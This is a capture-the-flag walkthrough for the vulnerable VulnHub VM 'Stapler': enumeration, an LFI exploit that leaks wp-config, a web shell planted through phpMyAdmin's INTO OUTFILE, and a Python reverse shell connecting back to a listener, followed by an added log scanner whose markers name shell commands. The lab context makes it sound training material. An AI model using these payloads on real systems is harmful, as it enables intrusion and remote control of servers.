Stapler VM – Walkthrough

Hi Friends,

Today we will see how to crack Stapler, a vulnerable machine that is available on VulnHub.

I will start by discovering the IP of the vulnerable machine using netdiscover

netdiscover -r

I found that Stapler is running on IP

Information Gathering:

I used Nmap, Nikto and WPScan

nmap -sS -A -p-

Found that port 21 (FTP) is open and anonymous login is allowed

Port 80 is open; I tried opening it in a browser but got nothing

So I tried FTP with anonymous login, using username Anonymous and password Anonymous

Logged in successfully and found a file called note

Download the note:

ftp> get note

I checked the nmap result again for open ports and found that port 12380 is open and running an Apache service

Now run the Nikto scanner on

Found useful information, such as:

  • The service uses SSL, meaning it is running on HTTPS
  • /admin112233/
  • /blogblog/

Tried access, ohhh

Tried access,

It is a blog. I looked at the page source and found that it is running WordPress

So I ran the WordPress scanner, i.e., wpscan, on the URL

wpscan --url --enumerate uap --disable-tls-checks

Found that directory listing is enabled for the plugins folder

Found the advanced-video-embed plugin, searched exploit-db.com for an exploit, and found an LFI exploit: https://www.exploit-db.com/exploits/39646/

This exploit retrieves the WordPress configuration file, i.e., wp-config.php

I ran the exploit after updating the URL, but it threw errors, so I updated some of the Python code, adding:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

Now successfully run the exploit and browse

We can see a jpeg file has been created

Open the file in text format

And we got configuration details

Now browse and enter username and password

We got full access to phpMyAdmin. We will upload a shell using SQL

SELECT "<?php echo shell_exec($_GET['cmd']); ?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php"


Successfully created shell.php; now execute commands like ifconfig

Now it's time to get a shell, thanks to pentestmonkey

python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I created URL and browse,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.3%22,1234));%20os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

Start netcat on Kali Linux to get the shell
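
Seen from the defender's side, the shell.php requests above leave a clear trace in the Apache access log. The following is an added example, not part of the original walkthrough: a small Python scanner that flags script requests under wp-content/uploads and command strings in decoded query parameters. The log format (Apache combined), the marker list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined/common log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A script served from the media upload tree should never be requested.
UPLOAD_SCRIPT_RE = re.compile(r"/wp-content/uploads/.*\.(?:php\d?|phtml|phar)$", re.I)
# Assumed starter list of strings seen in decoded command parameters.
CMD_MARKERS = ("/bin/sh", "/bin/bash", "socket.socket", "os.dup2", "ifconfig")


def analyse(line):
    """Return (client_ip, timestamp, findings) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    findings = []
    if UPLOAD_SCRIPT_RE.search(url.path):
        findings.append("script-in-uploads")
    # parse_qsl percent-decodes values, so %20/%22-encoded payloads match too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if any(marker in value.lower() for marker in CMD_MARKERS):
            findings.append("command-in-param:" + name)
    return (m["ip"], m["ts"], findings) if findings else None


def scan(lines):
    """Return the findings for every suspicious line, in log order."""
    return [hit for hit in map(analyse, lines) if hit]


# Constructed sample lines (documentation IP ranges), not captured from the VM.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jun/2016:10:01:02 +0000] "GET /blogblog/wp-content/uploads/photo.jpeg HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jun/2016:10:05:40 +0000] "GET /blogblog/wp-content/uploads/shell.php?cmd=ifconfig HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Jun/2016:10:07:11 +0000] "GET /blogblog/wp-content/uploads/shell.php'
    '?cmd=python%20-c%20%27import%20socket%3Bs%3Dsocket.socket%28%29%27 HTTP/1.1" 200 0',
    '203.0.113.9 - - [10/Jun/2016:10:09:00 +0000] "GET /blogblog/?p=12 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Denying PHP execution in the uploads directory and restricting MySQL's secure_file_priv would block the INTO OUTFILE step itself, so the scanner is a detection backstop rather than the primary control.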

Privilege Escalation

I am not root on this VM, so I need to do privilege escalation to get root permissions. We know that the VM is running Ubuntu 16.04, so search for an exploit


Got flag.txt 🙂
